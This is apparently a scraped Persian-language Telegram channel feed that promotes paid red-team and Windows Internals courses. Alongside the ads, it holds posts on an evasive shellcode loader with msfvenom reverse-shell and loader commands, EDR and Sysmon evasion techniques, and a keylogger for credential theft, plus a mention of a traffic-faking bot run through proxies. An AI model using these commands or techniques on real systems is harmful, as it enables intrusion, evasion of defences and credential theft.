تا بارگذاری تمامی ویدیو ها ، مشخصات و توضیحات در سایت ، برای دسترسی سریع و آسان تر ویدیو ها در کانال بله بارگذاری شده است
کانال بله :
https://ble.ir/RedTeamAPT
کانال بله :
https://ble.ir/RedTeamAPT
ble.ir
بله | کانال RedTeamAPT
Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
Admin : @HopeAPT
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
Admin : @HopeAPT
سلام به همه دوستان !
سایت تا آخر این هفته با کلی تغییرات دوباره بالا میاد! این آپدیتها رو داشتیم:
تکنیکها و متدها کاملاً آپدیت شدن.
ساختار سایت رو با تغییرات جدید MITRE ATT&CK هماهنگ کردیم.
طراحی و سئوی سایت رو بهبود دادیم تا راحتتر ازش استفاده کنید.
همه ویدیوها رو روی خود سایت میذاریم که دیگه نگران بسته شدن کانال تلگرام نباشیم!
یه خبر مهم دیگه: بعد از اینکه دوره Windows Internals تموم بشه، یه دوره کاربردی و جدید بر اساس MITRE ATT&CK داریم.
@RedTeamAcademy
سایت تا آخر این هفته با کلی تغییرات دوباره بالا میاد! این آپدیتها رو داشتیم:
تکنیکها و متدها کاملاً آپدیت شدن.
ساختار سایت رو با تغییرات جدید MITRE ATT&CK هماهنگ کردیم.
طراحی و سئوی سایت رو بهبود دادیم تا راحتتر ازش استفاده کنید.
همه ویدیوها رو روی خود سایت میذاریم که دیگه نگران بسته شدن کانال تلگرام نباشیم!
یه خبر مهم دیگه: بعد از اینکه دوره Windows Internals تموم بشه، یه دوره کاربردی و جدید بر اساس MITRE ATT&CK داریم.
@RedTeamAcademy
Telegram
RedTeamAPT Academy
Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
Group : @RedTeamAcademyChat
Admin : @RedTeamAdmin1
این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
Group : @RedTeamAcademyChat
Admin : @RedTeamAdmin1
این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
یکی از اهدافی که داریم برای سایت در قسمت mitre attack مثالهایی از تکنیک ها هست
ساده و جوری که مخرب نباشه ، اگرم بود راحت شناسایی بشه
برای مثال با پایتون ریورس شل نوشتیم و قرار دادیم
تا در بخش T1059.006: Python شما درک مطلب کاملی داشته باشید
ولی مثال های عملی تر و پیشرفته تر در دوره ها بیان میشه .
@RedTeamAcademy
ساده و جوری که مخرب نباشه ، اگرم بود راحت شناسایی بشه
برای مثال با پایتون ریورس شل نوشتیم و قرار دادیم
تا در بخش T1059.006: Python شما درک مطلب کاملی داشته باشید
ولی مثال های عملی تر و پیشرفته تر در دوره ها بیان میشه .
@RedTeamAcademy
سلام وقت عزیزان بخیر
سایت مجدد در دسترس قرار گرفت
دوره های آموزشی
و اتک های مایتره
https://redteamapt.ir/
سایت مجدد در دسترس قرار گرفت
دوره های آموزشی
و اتک های مایتره
https://redteamapt.ir/
Media is too big
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3
Process
Token
PrimaryToken
ImpersonationToken
فصل 1 و 2 منتشر شده است .
پیش نیاز : دوره ردتیم و اشنایی با c , c++
@RedTeamAcademy
Process
Token
PrimaryToken
ImpersonationToken
فصل 1 و 2 منتشر شده است .
پیش نیاز : دوره ردتیم و اشنایی با c , c++
@RedTeamAcademy
سلام وقت بخیر
نمونه ویدیو آموزشی windows internal فصل ۳ در سایت بارگزاری شد . (اخرین ویدیو صفحه)
بدون vpn سایت رو باز کنید.
ویدیو در رابطه با ساختار
Reverse shell att&ck
PPID ATT&CK
Startupinfo
Startupinfoex
Example c++ code
https://redteamapt.ir/course/%d8%af%d9%88%d8%b1%d9%87-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-windows-internal/
نمونه ویدیو آموزشی windows internal فصل ۳ در سایت بارگزاری شد . (اخرین ویدیو صفحه)
بدون vpn سایت رو باز کنید.
ویدیو در رابطه با ساختار
Reverse shell att&ck
PPID ATT&CK
Startupinfo
Startupinfoex
Example c++ code
https://redteamapt.ir/course/%d8%af%d9%88%d8%b1%d9%87-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-windows-internal/
با سلام و عرض ادب
به علت طولانی بودن و حجم بالای مطالب Windows Internal ، طی 6 مرحله دوره منتشر میشه
قیمت اصلی دوره بین هر فصل تقسیم میشود (اگر قیمت دوره 6 میلیون تومان باشد قیمت هر بخش 1 میلیون تومان میباشد که از لحاظ اقتصادی برای دوستان بهتر هست و فشار سنگین دوره نهایی و خرید کلی رو نداشته باشند ، قیمت دوره پس از انتشار اعلام میشود)
نحوه انتشار دوره Windows Internal :
فصل 1 و 2 : Concepts and tools , System architecture
فصل 3 : Processes and jobs
فصل 4 : Threads
فصل 5 : Memory management
فصل 6 : I/O system
فصل 7 : Security
این کار به علت این است که عزیزان بتوانند طی بازه هایی که زمان هست تا انتشار فصل بعدی فرصت مطالعه داشته باشند و تست های بسیاری در هر فصل وجود دارد به همراه کد هایی که در هر تست انجام میشه .
هر بخش حدود بین 100 تا 150 صفحه از کتاب هست .
دوره شامل سرفصل ها و تیتر های اصلی کتاب هست و تا حد ممکن کامل تر نیز شده است
در تمام دوره ما مثال و توضیحات Red Team و attack میزنیم .
کل دوره بین 80 تا 100 ساعت هست .
اگر استقبال ازین دوره خوب باشه در نظر دارم دوره هایی که تو ایران (اصلا نیست) و جهان اصلا شاید پیدا نکنید برگزار کنم :
Windows Internals Part 2
Windows 10 System Programming, Part 1
Windows 10 System Programming, Part 2
Windows Kernel Programming
windows-via-C and C++
فصل 1 و 2 دوره منتشر شده دوستان میتوانند از لینک زیر نمونه ویدیو های دوره ببینید (بدون VPN)
دوره آموزشی Windows Internal
فصل 3 در اواسط ضبط هستش و احتمالا تا اوایل ماه دیگه منتشر بشه
دوره های آموزشی اکادمی RedTeamAPT
——————-
@RedTeamAcademy
به علت طولانی بودن و حجم بالای مطالب Windows Internal ، طی 6 مرحله دوره منتشر میشه
قیمت اصلی دوره بین هر فصل تقسیم میشود (اگر قیمت دوره 6 میلیون تومان باشد قیمت هر بخش 1 میلیون تومان میباشد که از لحاظ اقتصادی برای دوستان بهتر هست و فشار سنگین دوره نهایی و خرید کلی رو نداشته باشند ، قیمت دوره پس از انتشار اعلام میشود)
نحوه انتشار دوره Windows Internal :
فصل 1 و 2 : Concepts and tools , System architecture
فصل 3 : Processes and jobs
فصل 4 : Threads
فصل 5 : Memory management
فصل 6 : I/O system
فصل 7 : Security
این کار به علت این است که عزیزان بتوانند طی بازه هایی که زمان هست تا انتشار فصل بعدی فرصت مطالعه داشته باشند و تست های بسیاری در هر فصل وجود دارد به همراه کد هایی که در هر تست انجام میشه .
هر بخش حدود بین 100 تا 150 صفحه از کتاب هست .
دوره شامل سرفصل ها و تیتر های اصلی کتاب هست و تا حد ممکن کامل تر نیز شده است
در تمام دوره ما مثال و توضیحات Red Team و attack میزنیم .
کل دوره بین 80 تا 100 ساعت هست .
اگر استقبال ازین دوره خوب باشه در نظر دارم دوره هایی که تو ایران (اصلا نیست) و جهان اصلا شاید پیدا نکنید برگزار کنم :
Windows Internals Part 2
Windows 10 System Programming, Part 1
Windows 10 System Programming, Part 2
Windows Kernel Programming
windows-via-C and C++
فصل 1 و 2 دوره منتشر شده دوستان میتوانند از لینک زیر نمونه ویدیو های دوره ببینید (بدون VPN)
دوره آموزشی Windows Internal
فصل 3 در اواسط ضبط هستش و احتمالا تا اوایل ماه دیگه منتشر بشه
دوره های آموزشی اکادمی RedTeamAPT
——————-
@RedTeamAcademy
This media is not supported in your browser
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3
به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست
دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید
فصل 1 و 2 دوره منتشر شده است
@RedTeamAcademy
به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست
دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید
فصل 1 و 2 دوره منتشر شده است
@RedTeamAcademy
تمامی کد ها و نوت ها ب دوستان تو همه دوره ها ارسال میشه
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!
@RedTeamAcademy
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!
@RedTeamAcademy
دیشب داشتم روی یه چیزی کار میکردم با پایتون
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....
بماند که من این رو برای یه کاری درست کردم😎
@RedTeamAcademy
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....
بماند که من این رو برای یه کاری درست کردم😎
@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM
RedTeam 🔴 vs 🔵 BlueTeam
دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .
@RedTeamAcademy
دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .
@RedTeamAcademy
جنگ واقعی RedTeam و BlueTeam اینجا رخ میده .
بخشی از دوره Windows Internal فصل 3
دوره آموزشی Windows Internal
@RedTeamAcademy
بخشی از دوره Windows Internal فصل 3
دوره آموزشی Windows Internal
@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM
قانون تغییرناپذیری (Immutability) :
تمام فیلدهای درون یک توکن به دلیل قرار داشتن در حافظه کرنل کاملاً غیرقابل تغییر (Immutable) هستند. هیچکدام از امتیازات یا SIDها از لایه کاربر (User Mode) قابل دستکاری نیستند، مگر از طریق سیستمکالهای رسمی و مجاز که خود سیستمعامل برای این کار تعبیه کرده است.
رد تیمر : 👀
👇مشاهده دوره های آموزشی
🔗 https://redteamapt.ir/course/
@RedTeamAcademy 🚫
@RedTeamAcademy
🔴 لودر شلکد فوقالعاده گریزناپذیر برای Red Team
یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب میشه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شلکد دلخواه با حداقل ردپا و حداکثر پنهانکاری در سیستم هدف است.
قابلیتهای کلیدی:
- تولید لودرهای شلکد گریزناپذیر با تکنیکهای پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روشهای تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهمسازی (Obfuscation) قوی شلکد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیکهای پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشتهشده با C/C++ برای کنترل سطح پایین و عملکرد بهینه
نحوه استفاده:
لودر تولیدشده (
---
🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir
یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب میشه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شلکد دلخواه با حداقل ردپا و حداکثر پنهانکاری در سیستم هدف است.
قابلیتهای کلیدی:
- تولید لودرهای شلکد گریزناپذیر با تکنیکهای پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روشهای تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهمسازی (Obfuscation) قوی شلکد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیکهای پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشتهشده با C/C++ برای کنترل سطح پایین و عملکرد بهینه
نحوه استفاده:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw -o payload.bin
.\Rattle.exe -s payload.bin -t hollow -o loader.exe
# -e : فعالسازی encryption
# -u : فعالسازی unhooking
لودر تولیدشده (
loader.exe) رو روی هدف اجرا کنید و لذت ببرید! 🚀---
🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir
هنر دور زدن Sysmon (EID 7) با Reflective DLL Injection و چالشهای OPSEC
مهاجمان حرفهای علاقهای به جا گذاشتن ردپا روی دیسک ندارند. تزریق DLL بازتابی (Reflective DLL Injection) یک تکنیک پیشرفته است که به ما اجازه میدهد یک پیلود (مانند Cobalt Strike Beacon یا Meterpreter) را مستقیماً و به صورت دستی (Manual Mapping) داخل حافظه یک فرآیند هدف بارگذاری کنیم.
🔥 مزیت تهاجمی (چرا EID 7 دور زده میشود؟)
در حالت عادی، وقتی یک DLL لود میشود، سیستمعامل درگیر شده و Sysmon Event ID 7 (ImageLoad) لاگ میاندازد. اما شاهکار Reflective Injection این است که نیازی به توابع استاندارد ویندوز (مثل
⚠️ خطاهای OPSEC و فرصتهای Blue Team
آیا با این روش کاملاً نامرئی هستیم؟ خیر! اگرچه لود شدن ماژول پنهان میماند، اما اجرای آن در فرآیند هدف نیازمند ایجاد یک Thread جدید است. مهاجمانی که از روشهای پایه برای تزریق استفاده میکنند، معمولاً روی Sysmon Event ID 8 (CreateRemoteThread) شکار میشوند.
همچنین، تخصیص حافظه از نوع
🔍 شکار تهدید (دیدگاه Blue Team):
تیمهای دفاعی به جای جستجوی ماژولهای لود شده، باید به دنبال تزریقهای حافظه و Threadهای مشکوک بگردند. کوئری زیر (SPL/KQL-مانند) به دنبال پروسههایی میگردد که در حال تزریق Thread به پروسههای استاندارد ویندوز هستند:
💡 نکته پیشرفته برای Red Team:
برای ارتقای OPSEC و دور زدن هشدارهای EID 8 و اسکنرهای حافظه، مهاجمان پیشرفته به جای
🆔 @RedTeamAcademy
🌐 https://RedTeamApt.ir
مهاجمان حرفهای علاقهای به جا گذاشتن ردپا روی دیسک ندارند. تزریق DLL بازتابی (Reflective DLL Injection) یک تکنیک پیشرفته است که به ما اجازه میدهد یک پیلود (مانند Cobalt Strike Beacon یا Meterpreter) را مستقیماً و به صورت دستی (Manual Mapping) داخل حافظه یک فرآیند هدف بارگذاری کنیم.
🔥 مزیت تهاجمی (چرا EID 7 دور زده میشود؟)
در حالت عادی، وقتی یک DLL لود میشود، سیستمعامل درگیر شده و Sysmon Event ID 7 (ImageLoad) لاگ میاندازد. اما شاهکار Reflective Injection این است که نیازی به توابع استاندارد ویندوز (مثل
LoadLibrary) ندارد. ماژول مخرب خودش نقش OS Loader را بازی کرده و وابستگیها را در حافظه حل میکند. نتیجه؟ سیستمعامل متوجه لود شدن ماژول جدید نمیشود، EID 7 به هیچ وجه تریگر نمیگردد، و رادارهای مبتنی بر مانیتورینگ ماژول کاملاً کور میشوند.⚠️ خطاهای OPSEC و فرصتهای Blue Team
آیا با این روش کاملاً نامرئی هستیم؟ خیر! اگرچه لود شدن ماژول پنهان میماند، اما اجرای آن در فرآیند هدف نیازمند ایجاد یک Thread جدید است. مهاجمانی که از روشهای پایه برای تزریق استفاده میکنند، معمولاً روی Sysmon Event ID 8 (CreateRemoteThread) شکار میشوند.
همچنین، تخصیص حافظه از نوع
PAGE_EXECUTE_READWRITE (RWX) که پشتوانه فایل فیزیکی روی دیسک (Unbacked Memory) ندارد، لقمه چرب و نرمی برای Memory Scannerهای ابزارهای EDR است.🔍 شکار تهدید (دیدگاه Blue Team):
تیمهای دفاعی به جای جستجوی ماژولهای لود شده، باید به دنبال تزریقهای حافظه و Threadهای مشکوک بگردند. کوئری زیر (SPL/KQL-مانند) به دنبال پروسههایی میگردد که در حال تزریق Thread به پروسههای استاندارد ویندوز هستند:
EventID=8
| where TargetImage has_any ("explorer.exe", "svchost.exe", "rundll32.exe", "notepad.exe")
| where SourceImage != TargetImage
| project TimeGenerated, Hostname, SourceImage, TargetImage, StartAddress, StartFunction
💡 نکته پیشرفته برای Red Team:
برای ارتقای OPSEC و دور زدن هشدارهای EID 8 و اسکنرهای حافظه، مهاجمان پیشرفته به جای
CreateRemoteThread از تکنیکهایی نظیر Thread Hijacking یا APC Injection (Early Bird) استفاده میکنند و برای فرار از حافظههای RWX به سراغ تکنیکهای Module Stomping میروند.🆔 @RedTeamAcademy
🌐 https://RedTeamApt.ir
چالش امنیتی: عملیات شبح (تزریق کد و دور زدن EDR) 💻🔥
🎯 سناریو:
شما به عنوان یک Red Teamer به یک سیستم Windows 10 x64 دسترسی (با دسترسی Administrator) پیدا کردهاید. هدف شما اجرای یک شلکد کوچک (مثلاً پاپآپ کردن calc.exe) در بستر یک فرآیند قانونی و در حال اجرا (مثل notepad.exe) است.
🛡 موانع (EDR سفارشی سیستم):
یک EDR سختگیر روی سیستم فعال است که مکانیزمهای دفاعی زیر را دارد:
1️⃣ User-Mode Hooking: توابع حساس مانند NtCreateThreadEx، NtWriteVirtualMemory، CreateRemoteThread و QueueUserAPC را در سطح User-Mode رهگیری میکند.
2️⃣ Heuristics & Memory Scanning: به شدت روی نواحی حافظه با مجوز RWX حساس است (به ویژه مموریهای Unbacked) و Call Stackها را برای پیدا کردن منشأ اجرای غیرطبیعی بررسی میکند.
3️⃣ Parent-Child Anomalies: ایجاد پروسههای جدید توسط پروسههای غیرمرتبط یا تزریقهای مشکوک بین پروسهای را مانیتور میکند.
🔴 برای دور زدن User-Mode Hooks:
باید به Direct Syscalls (مثل استفاده از ابزار SysWhispers) یا بهتر از آن Indirect Syscalls (برای طبیعی جلوه دادن Call Stack با پرش به ntdll.dll) اشاره کنند.
🔴 برای فرار از Memory Scanning (RWX و Unbacked Memory):
باید به جای VirtualAllocEx، از تکنیک Module Stomping / Module Overloading استفاده کنند. (یعنی یک DLL قانونی که استفاده نمیشود را در notepad.exe لود کنند و شلکد خود را روی بخش .text آن اوررایت (Overwrite) کنند تا حافظه، پشتوانه فایل فیزیکی یا همان File-backed داشته باشد و در نهایت با مجوز RX اجرا شود نه RWX).
🔴 برای فرار از Thread Creation (دور زدن مانیتورینگ EID 8 و APIها):
به جای ساخت Thread جدید، باید از تکنیک Thread Hijacking استفاده کنند (Suspend کردن یک Thread موجود در notepad، تغییر RIP به آدرس شلکد با SetThreadContext، و سپس Resume کردن آن).
🔴 گزینه جایگزین با توجه به دسترسی Admin:
چون دسترسی Admin دادید، استفاده از تکنیک BYOVD (Bring Your Own Vulnerable Driver) برای کور کردن موقت EDR از طریق Kernel-Mode هم یک جواب کاملاً معتبر و سطح بالاست!
🆔 @RedTeamAcademy
🌐https://redteamapt.ir
🎯 سناریو:
شما به عنوان یک Red Teamer به یک سیستم Windows 10 x64 دسترسی (با دسترسی Administrator) پیدا کردهاید. هدف شما اجرای یک شلکد کوچک (مثلاً پاپآپ کردن calc.exe) در بستر یک فرآیند قانونی و در حال اجرا (مثل notepad.exe) است.
🛡 موانع (EDR سفارشی سیستم):
یک EDR سختگیر روی سیستم فعال است که مکانیزمهای دفاعی زیر را دارد:
1️⃣ User-Mode Hooking: توابع حساس مانند NtCreateThreadEx، NtWriteVirtualMemory، CreateRemoteThread و QueueUserAPC را در سطح User-Mode رهگیری میکند.
2️⃣ Heuristics & Memory Scanning: به شدت روی نواحی حافظه با مجوز RWX حساس است (به ویژه مموریهای Unbacked) و Call Stackها را برای پیدا کردن منشأ اجرای غیرطبیعی بررسی میکند.
3️⃣ Parent-Child Anomalies: ایجاد پروسههای جدید توسط پروسههای غیرمرتبط یا تزریقهای مشکوک بین پروسهای را مانیتور میکند.
🔴 برای دور زدن User-Mode Hooks:
باید به Direct Syscalls (مثل استفاده از ابزار SysWhispers) یا بهتر از آن Indirect Syscalls (برای طبیعی جلوه دادن Call Stack با پرش به ntdll.dll) اشاره کنند.
🔴 برای فرار از Memory Scanning (RWX و Unbacked Memory):
باید به جای VirtualAllocEx، از تکنیک Module Stomping / Module Overloading استفاده کنند. (یعنی یک DLL قانونی که استفاده نمیشود را در notepad.exe لود کنند و شلکد خود را روی بخش .text آن اوررایت (Overwrite) کنند تا حافظه، پشتوانه فایل فیزیکی یا همان File-backed داشته باشد و در نهایت با مجوز RX اجرا شود نه RWX).
🔴 برای فرار از Thread Creation (دور زدن مانیتورینگ EID 8 و APIها):
به جای ساخت Thread جدید، باید از تکنیک Thread Hijacking استفاده کنند (Suspend کردن یک Thread موجود در notepad، تغییر RIP به آدرس شلکد با SetThreadContext، و سپس Resume کردن آن).
🔴 گزینه جایگزین با توجه به دسترسی Admin:
چون دسترسی Admin دادید، استفاده از تکنیک BYOVD (Bring Your Own Vulnerable Driver) برای کور کردن موقت EDR از طریق Kernel-Mode هم یک جواب کاملاً معتبر و سطح بالاست!
🆔 @RedTeamAcademy
🌐https://redteamapt.ir
فصل سوم از دوره Windows Internal با دید RedTeam منتشر شد.
فصل اول و دوم دوره نیز منتشر شده است.
نمونه ویدیو های دوره و توضیحات در سایت منتشر شده است .
تمامی ابزار ها و کد ها نوشته در دوره به دوستان ارسال میشود .
تهیه دوره : @RedTeamAdmin1
اطلاعات دوره : دوره آموزشی Windows Internal (بدون VPN)
فصل اول و دوم دوره نیز منتشر شده است.
نمونه ویدیو های دوره و توضیحات در سایت منتشر شده است .
تمامی ابزار ها و کد ها نوشته در دوره به دوستان ارسال میشود .
تهیه دوره : @RedTeamAdmin1
اطلاعات دوره : دوره آموزشی Windows Internal (بدون VPN)
همانطور که دیدید، کانالهای قبلی ما به خاطر انتشار سناریوهای عملی و اتکهای واقعی (Real-World) با ریپورت پلتفرم مواجه و بسته شدند. تلگرام روی این مدل محتوای حساس به شدت سختگیر است.
حیفه ین موارد ارشیو بشه فقط برای خودم ؛ به همین خاطر از این به بعد تمام گزارشهای فنی، تحلیل اتکهای واقعی و سناریوهای Red Teaming را با رعایت اصول محرمانگی در لینکدین منتشر میکنم. (دقیقا مثل قبل)
اولین کیس واقعی (کشف دسترسی و لو رفتن اطلاعات حساس زیرساخت مانیتورینگ گمرک) را همین امروز آپلود کردم.
اگر میخواهید تحلیلهای فنی و اتکهای واقعی را از این به بعد دنبال کنید، از طریق لینک زیر کانکت شوید:
www.linkedin.com/in/omid-abiri-redteamapt
حیفه ین موارد ارشیو بشه فقط برای خودم ؛ به همین خاطر از این به بعد تمام گزارشهای فنی، تحلیل اتکهای واقعی و سناریوهای Red Teaming را با رعایت اصول محرمانگی در لینکدین منتشر میکنم. (دقیقا مثل قبل)
اولین کیس واقعی (کشف دسترسی و لو رفتن اطلاعات حساس زیرساخت مانیتورینگ گمرک) را همین امروز آپلود کردم.
اگر میخواهید تحلیلهای فنی و اتکهای واقعی را از این به بعد دنبال کنید، از طریق لینک زیر کانکت شوید:
www.linkedin.com/in/omid-abiri-redteamapt
باتوجه به شرایط فعلی که مشخص نیست مجدد جنگ شروع بشه یا خیر
و نت ها مجدد قطع بشه یا پایدار بمونه
دوستان تو بله میتونن با ما همراه بشن
در صورت قطع اینترنت فعالیت اونجا مجدد شروع میشه و الا در تلگرام فعالیت ما پابرجا خواهد بود
🆔 شناسه:
https://ble.ir/RedTeamAPT
و نت ها مجدد قطع بشه یا پایدار بمونه
دوستان تو بله میتونن با ما همراه بشن
در صورت قطع اینترنت فعالیت اونجا مجدد شروع میشه و الا در تلگرام فعالیت ما پابرجا خواهد بود
🆔 شناسه:
https://ble.ir/RedTeamAPT
🕵️♂️ بررسی یک Keylogger اما کاربردی از دیدگاه MalDev و Red Team بخشی از دوره Windows Internal (بدون vpn)
یک نمونه اسکریپت لایو از یک Window-Aware Keylogger رو که به زبان C++ نوشته شده در لینک های انتهایی پست مشاهده میکنید اما این ابزار دقیقاً چطور کار میکنه و در عملیاتهای تیم قرمز چه کاربردی داره؟
🔍 این keylogger چطور کار میکنه؟
برخلاف keylogger سنتی که فقط یک متن طولانی و نامفهوم از کلیدها پس میدن، این نمونه هوشمندتر عمل میکنه:
1. Window Tracking
2. Key Mapping & Logging
3. Contextual Output
---
🔥 در سناریوهای Red Teaming با این ابزار چه کارهایی میشه کرد؟
یک کیلاگر پنجره-محور در فاز Post-Exploitation یا دسترسی اولیه، اهداف زیر رو دنبال میکنه:
* سرقت اطلاعات حساس (Credential Harvesting): شکار نامهای کاربری، پسوردها و توکنهای احراز هویت به محض تایپ شدن در پنجرههای لاگین یا مرورگر.
* مانیتورینگ رفتار ادمین (Reconnaissance): همانطور که در تصویر مشخصه، مهاجم دقیقاً میبینه ادمین چه دستوراتی رو در PowerShell یا Run ویندوز وارد میکنه (مثلاً دستورات ابزارهای داخلی، جابهجایی در دایرکتوریها و...).
* کشف ساختار شبکه و سیستم: مانیتور کردن نام فایلها، تایتل پنجرههای باز و برنامههای کاستوم سازمانی که هدف ازشون استفاده میکنه.
https://www.linkedin.com/posts/omid-abiri-redteamapt_redteam-security-it-share-7480611260296957952-KgLd/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAAFjfyKoBT5fWVrc66SK8KuCpZMLK3C-Ecwc
یک نمونه اسکریپت لایو از یک Window-Aware Keylogger رو که به زبان C++ نوشته شده در لینک های انتهایی پست مشاهده میکنید اما این ابزار دقیقاً چطور کار میکنه و در عملیاتهای تیم قرمز چه کاربردی داره؟
🔍 این keylogger چطور کار میکنه؟
برخلاف keylogger سنتی که فقط یک متن طولانی و نامفهوم از کلیدها پس میدن، این نمونه هوشمندتر عمل میکنه:
1. Window Tracking
2. Key Mapping & Logging
3. Contextual Output
---
🔥 در سناریوهای Red Teaming با این ابزار چه کارهایی میشه کرد؟
یک کیلاگر پنجره-محور در فاز Post-Exploitation یا دسترسی اولیه، اهداف زیر رو دنبال میکنه:
* سرقت اطلاعات حساس (Credential Harvesting): شکار نامهای کاربری، پسوردها و توکنهای احراز هویت به محض تایپ شدن در پنجرههای لاگین یا مرورگر.
* مانیتورینگ رفتار ادمین (Reconnaissance): همانطور که در تصویر مشخصه، مهاجم دقیقاً میبینه ادمین چه دستوراتی رو در PowerShell یا Run ویندوز وارد میکنه (مثلاً دستورات ابزارهای داخلی، جابهجایی در دایرکتوریها و...).
* کشف ساختار شبکه و سیستم: مانیتور کردن نام فایلها، تایتل پنجرههای باز و برنامههای کاستوم سازمانی که هدف ازشون استفاده میکنه.
https://www.linkedin.com/posts/omid-abiri-redteamapt_redteam-security-it-share-7480611260296957952-KgLd/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAAFjfyKoBT5fWVrc66SK8KuCpZMLK3C-Ecwc
LinkedIn
#redteam #security #it #blueteam | Omid Abiri
Keylogger attack in Windows Internal Course !!!
https://lnkd.in/exPjYrjh
#redteam #security #it #blueteam
https://lnkd.in/exPjYrjh
#redteam #security #it #blueteam